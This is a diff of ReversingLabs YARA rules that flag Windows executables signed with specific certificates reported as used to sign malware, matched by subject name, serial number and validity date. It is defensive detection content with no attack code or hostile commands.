-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SALES & MAINTENANCE LIMITED" and ( pe.signatures [ i ] . serial == "00:93:6b:c2:56:d2:05:7c:a9:b9:ec:30:34:c3:ed:0e:e6" or pe.signatures [ i ] . serial == "93:6b:c2:56:d2:05:7c:a9:b9:ec:30:34:c3:ed:0e:e6" ) and 1616889600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CharacTell Ltd" and ( pe.signatures [ i ] . serial == "00:9b:10:8b:8a:1d:aa:0d:55:81:f5:9f:ce:e0:44:79:01" or pe.signatures [ i ] . serial == "9b:10:8b:8a:1d:aa:0d:55:81:f5:9f:ce:e0:44:79:01" ) and 1380671999 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_Afe8Fee94B41422E01E4897Bcd52D0A4 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_5F8203C430Fc7Db4E61F6684F6829Ffc : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "83d08ca6-2a0b-5da3-8d53-7bf8bcc361cf"
+		id = "975cd500-2f08-55c9-a821-4dde3a54ae0c"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L9592-L9610"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "02c55b182bc9843334baed9c0a7cca2c88cd1de00ca9b47b10ec79b7a5acf9bb"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L2506-L2522"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "cd22d1beea12d1f6c50f69e76074c2582ce5567887056c43d4d6c87d33fce1bf"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -12415,21 +37080,21 @@ rule REVERSINGLABS_Cert_Blocklist_Afe8Fee94B41422E01E4897Bcd52D0A4 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TLGM ApS" and ( pe.signatures [ i ] . serial == "00:af:e8:fe:e9:4b:41:42:2e:01:e4:89:7b:cd:52:d0:a4" or pe.signatures [ i ] . serial == "af:e8:fe:e9:4b:41:42:2e:01:e4:89:7b:cd:52:d0:a4" ) and 1617062400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Haivision Network Video" and pe.signatures [ i ] . serial == "5f:82:03:c4:30:fc:7d:b4:e6:1f:66:84:f6:82:9f:fc" and 1382572799 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_718E89Ddb33257Ea77Ba74Be7F2Baf1D : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_6B6Daef5Be29F20Ddce4B0F5E9Fa6Ea5 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "d173c2b2-2b76-521a-aac1-ae69fdf5b16b"
+		id = "55611c9a-d45d-55fa-8e5e-a5621223cc9d"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L9612-L9628"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "2f0defa1e1d905d937677e96f2a0955d9737f6976596932cc093fdecfea3fdb0"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L2524-L2540"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "edd2f302d2fac65f6a93372a24c3f80757f2b175af661032917366e9629c5491"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -12439,21 +37104,21 @@ rule REVERSINGLABS_Cert_Blocklist_718E89Ddb33257Ea77Ba74Be7F2Baf1D : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Trap Capital ApS" and pe.signatures [ i ] . serial == "71:8e:89:dd:b3:32:57:ea:77:ba:74:be:7f:2b:af:1d" and 1635462927 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Calibration Consultants" and pe.signatures [ i ] . serial == "6b:6d:ae:f5:be:29:f2:0d:dc:e4:b0:f5:e9:fa:6e:a5" and 1280447999 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_4D3E38F4Aebbc32257450726B29Be117 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_57D6Dff1Ef96F01B9430666B2733Cc87 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "173f89ca-e7b3-507b-96c1-325dd06210f8"
+		id = "c20b81a1-7331-57a9-9daf-007ec516a473"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L9630-L9646"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "f618547942fcd9b3d1104cb5bedeecec8596fa7cc34bca838b6120085b305d73"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L2542-L2558"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "40d22137e9c5345859c5f000166da2a3117bcfcc19b4c5e81083cad80dfa6ee4"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -12463,21 +37128,21 @@ rule REVERSINGLABS_Cert_Blocklist_4D3E38F4Aebbc32257450726B29Be117 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "POLE & AERIAL FITNESS LIMITED" and pe.signatures [ i ] . serial == "4d:3e:38:f4:ae:bb:c3:22:57:45:07:26:b2:9b:e1:17" and 1636123882 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Smart Plugin Ltda" and pe.signatures [ i ] . serial == "57:d6:df:f1:ef:96:f0:1b:94:30:66:6b:27:33:cc:87" and 1314575999 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_8F4C49Dae1F1Ff0Ebe9104C6F73242Bd : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_0166B65038D61E5435B48204Cae4795A : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "b7731056-1674-5375-a3cb-69632670d6d9"
+		id = "04bdefc5-ee4e-5a46-94d6-e3a5d8b56ce0"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L9648-L9666"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "a8c99cc30b791a76fe3cd48184bf95ee47abb30bd200128efd2f5295ee18f7b1"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L2560-L2576"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "4e289eda4d5381250bcd6e36daade6f1e1803b6d16578d7eaee4454cef6981d0"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -12487,21 +37152,21 @@ rule REVERSINGLABS_Cert_Blocklist_8F4C49Dae1F1Ff0Ebe9104C6F73242Bd : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Contact Merger Holding ApS" and ( pe.signatures [ i ] . serial == "00:8f:4c:49:da:e1:f1:ff:0e:be:91:04:c6:f7:32:42:bd" or pe.signatures [ i ] . serial == "8f:4c:49:da:e1:f1:ff:0e:be:91:04:c6:f7:32:42:bd" ) and 1636039748 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TOLGA KAPLAN" and pe.signatures [ i ] . serial == "01:66:b6:50:38:d6:1e:54:35:b4:82:04:ca:e4:79:5a" and 1403999999 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_Ac3C05F1Cb9453De8E7110F589Fb32C0 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_784F226B45C3Bd8E4089243D747D1F59 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "2578655e-6420-5a67-9116-cab5cf5bc195"
+		id = "f2a979e0-2027-5143-8cb4-ffcfd19faf45"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L9668-L9686"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "6328fd5dbb497c69ddc9151f85754669760b709ecbff3e8f320a40a62ca0dd2c"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L2578-L2594"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "df8ca35a07ec6815d1efb68fa6fbf8f80c57032ecb99d0b038da0604ceffe8cf"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -12511,21 +37176,21 @@ rule REVERSINGLABS_Cert_Blocklist_Ac3C05F1Cb9453De8E7110F589Fb32C0 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TRAIN BUILDING TEAM s.r.o." and ( pe.signatures [ i ] . serial == "00:ac:3c:05:f1:cb:94:53:de:8e:71:10:f5:89:fb:32:c0" or pe.signatures [ i ] . serial == "ac:3c:05:f1:cb:94:53:de:8e:71:10:f5:89:fb:32:c0" ) and 1635854205 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FSPro Labs" and pe.signatures [ i ] . serial == "78:4f:22:6b:45:c3:bd:8e:40:89:24:3d:74:7d:1f:59" and 1242777599 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_Fbb96A90B6718810311767Ca25Ab1E48 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_11690F05604445Fae0De539Eeeeec584 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "77319b9c-6075-5ac7-958c-d76916873e85"
+		id = "e6513bd1-2524-5baa-8484-b7e0f2f0c02a"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L9688-L9706"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "431e3364a42b272d9b71b92dee44cc185ef034a45a0b72bbda82cf7e9b29c355"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L2596-L2612"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "b66257f562f698559910eb9576f8fdf0ce3a750cc0a96a27e2ec1a18872ad13f"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -12535,21 +37200,21 @@ rule REVERSINGLABS_Cert_Blocklist_Fbb96A90B6718810311767Ca25Ab1E48 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Rakurs LLC" and ( pe.signatures [ i ] . serial == "00:fb:b9:6a:90:b6:71:88:10:31:17:67:ca:25:ab:1e:48" or pe.signatures [ i ] . serial == "fb:b9:6a:90:b6:71:88:10:31:17:67:ca:25:ab:1e:48" ) and 1636046757 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Tera information Technology co.Ltd" and pe.signatures [ i ] . serial == "11:69:0f:05:60:44:45:fa:e0:de:53:9e:ee:ee:c5:84" and 1294703999 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_Cfd38423Aef875A10B16644D058297E2 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_Aa146Bff4B832Bdbfe30B84580356763 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "f53e4f44-dde2-5f7a-8cab-71e91ff75d28"
+		id = "90fab567-f39f-5d0b-b0d9-a93693a05a01"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L9708-L9726"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "a2f67cbf31c9db2891892c31a7ed4ce7eccd834bfb10ae70f58e46f8e68e7c17"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L2614-L2632"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "37abe7a4fd773fd34f5d7dbe725ba4edcfb8ebb501dc41f386b8b0629161051f"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -12559,21 +37224,21 @@ rule REVERSINGLABS_Cert_Blocklist_Cfd38423Aef875A10B16644D058297E2 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TRUST DANMARK ApS" and ( pe.signatures [ i ] . serial == "00:cf:d3:84:23:ae:f8:75:a1:0b:16:64:4d:05:82:97:e2" or pe.signatures [ i ] . serial == "cf:d3:84:23:ae:f8:75:a1:0b:16:64:4d:05:82:97:e2" ) and 1632884040 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yancheng Peoples Information Technology Service Co., Ltd" and ( pe.signatures [ i ] . serial == "00:aa:14:6b:ff:4b:83:2b:db:fe:30:b8:45:80:35:67:63" or pe.signatures [ i ] . serial == "aa:14:6b:ff:4b:83:2b:db:fe:30:b8:45:80:35:67:63" ) and 1295481599 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_E6C05C5A2222Bf92818324A3A7374Ad3 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_E86F46B60142092Aae81B8F6Fa3D9C7C : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "2b5b79d8-e8fa-5593-b4c4-89af1f711152"
+		id = "fde17cc1-a968-5134-b12b-d65cb34c086f"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L9728-L9746"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "bea8fea49144abc109e33a5964bb8e113aa61b4cd70c72a43183cb0840429571"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L2634-L2652"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "6de16a44bc84fbf8f1d3d82526e1d7f8fd4ae3da6deaa471c77d2c8df47a14b0"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -12583,21 +37248,21 @@ rule REVERSINGLABS_Cert_Blocklist_E6C05C5A2222Bf92818324A3A7374Ad3 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ANAQA EVENTS LTD" and ( pe.signatures [ i ] . serial == "00:e6:c0:5c:5a:22:22:bf:92:81:83:24:a3:a7:37:4a:d3" or pe.signatures [ i ] . serial == "e6:c0:5c:5a:22:22:bf:92:81:83:24:a3:a7:37:4a:d3" ) and 1634720407 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Syncode Sistemas e Tecnologia Ltda" and ( pe.signatures [ i ] . serial == "00:e8:6f:46:b6:01:42:09:2a:ae:81:b8:f6:fa:3d:9c:7c" or pe.signatures [ i ] . serial == "e8:6f:46:b6:01:42:09:2a:ae:81:b8:f6:fa:3d:9c:7c" ) and 1373932799 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_75Ce08Bdbad44123299Dbe9D7C1D20De : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_1A0Fd2A4Ef4C2A36Ab9C5E8F792A35E2 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "e8e2d3b6-077f-56ba-9f2a-1941bf2ebdeb"
+		id = "7148a21a-97d6-59a2-a1cf-442c271bc0b5"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L9748-L9764"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "8ba66ab55f9a6755e11a7f39152aa26917271c7f6bc5ffdb42d07ad791fb47d7"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L2654-L2670"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "8e768415998a6a92961986cb0a9d310514d928be93b3e5a9aaa9ec71bf5886ad"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -12607,21 +37272,21 @@ rule REVERSINGLABS_Cert_Blocklist_75Ce08Bdbad44123299Dbe9D7C1D20De : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Rose Holm International ApS" and pe.signatures [ i ] . serial == "75:ce:08:bd:ba:d4:41:23:29:9d:be:9d:7c:1d:20:de" and 1631007095 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE5\\x8C\\x97\\xE4\\xBA\\xAC\\xE9\\x87\\x91\\xE5\\x88\\xA9\\xE5\\xAE\\x8F\\xE6\\x98\\x8C\\xE7\\xA7\\x91\\xE6\\x8A\\x80\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and pe.signatures [ i ] . serial == "1a:0f:d2:a4:ef:4c:2a:36:ab:9c:5e:8f:79:2a:35:e2" and 1389311999 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_333705C20B56E57F60B5Eb191Eef0D90 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_53Bb753B79A99E61A6E822Ac52460C70 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "7f98e550-fca6-564f-bbad-40e153f17adc"
+		id = "6339d548-775b-52b9-84c5-a79de23a16b2"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L9766-L9782"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "30eeec467b837f6b1759cd0fd6a8bc2e8942f2400df170c671287f4159652479"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L2672-L2688"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "24ff4f46fa6e85c25e130459f9b8d6907cf6cd51098e0cf45ec11d54d7de509b"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -12631,21 +37296,21 @@ rule REVERSINGLABS_Cert_Blocklist_333705C20B56E57F60B5Eb191Eef0D90 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TASK Holding ApS" and pe.signatures [ i ] . serial == "33:37:05:c2:0b:56:e5:7f:60:b5:eb:19:1e:ef:0d:90" and 1634233052 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xEB\\x8D\\xB0\\xEC\\x8A\\xA4\\xED\\x81\\xAC\\xED\\x83\\x91\\xEC\\x95\\x84\\xEC\\x9D\\xB4\\xEC\\xBD\\x98" and pe.signatures [ i ] . serial == "53:bb:75:3b:79:a9:9e:61:a6:e8:22:ac:52:46:0c:70" and 1400543999 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_A2A0Ba281262Acce7A00119E25564386 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_83F68Fc6834Bf8Bd2C801A2D1F1Acc76 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "ab0c7b78-5e7e-5cb9-ae61-d88f3f8d9684"
+		id = "763d4faf-19af-5349-a643-4773055df47a"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L9784-L9802"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "f5e3c16f6caaf5f3152d90dc48895d0bbcdb296c368beeebb96157f03a8ded40"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L2690-L2708"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "35552242f9f0a56b45e30e6f376877446f33e24690ff5d7b03dc776fab178afd"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -12655,21 +37320,21 @@ rule REVERSINGLABS_Cert_Blocklist_A2A0Ba281262Acce7A00119E25564386 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Sopiteks LLC" and ( pe.signatures [ i ] . serial == "00:a2:a0:ba:28:12:62:ac:ce:7a:00:11:9e:25:56:43:86" or pe.signatures [ i ] . serial == "a2:a0:ba:28:12:62:ac:ce:7a:00:11:9e:25:56:43:86" ) and 1631908320 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Helpful Technologies, Inc" and ( pe.signatures [ i ] . serial == "00:83:f6:8f:c6:83:4b:f8:bd:2c:80:1a:2d:1f:1a:cc:76" or pe.signatures [ i ] . serial == "83:f6:8f:c6:83:4b:f8:bd:2c:80:1a:2d:1f:1a:cc:76" ) and 1407715199 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_338483Cc174C16Ebc454A3803Ffd4217 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_F385E765Acfb95605C9B35Ca4C32F80E : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "ce30ace6-c2c2-5f3e-a2f7-1f08825d44eb"
+		id = "865f8daf-35c4-5437-9c97-9b9fc48d7d70"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L9804-L9820"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "7d7dd55eaab15cf458e5e57f0e5fbebdcc9313aee05394310a5cf9d9b4def153"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L2710-L2728"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "c73c8f1913d3423a52f5e77751813460ae9200eb3cb1cc6e2ec30f37f0da8152"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -12679,21 +37344,21 @@ rule REVERSINGLABS_Cert_Blocklist_338483Cc174C16Ebc454A3803Ffd4217 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Lpr:n Laatu-Ravintolat Oy" and pe.signatures [ i ] . serial == "33:84:83:cc:17:4c:16:eb:c4:54:a3:80:3f:fd:42:17" and 1635208206 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CWI SOFTWARE LTDA" and ( pe.signatures [ i ] . serial == "00:f3:85:e7:65:ac:fb:95:60:5c:9b:35:ca:4c:32:f8:0e" or pe.signatures [ i ] . serial == "f3:85:e7:65:ac:fb:95:60:5c:9b:35:ca:4c:32:f8:0e" ) and 1382313599 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_Be89936C26Cd0D845074F6B7B47F480C : INFO FILE
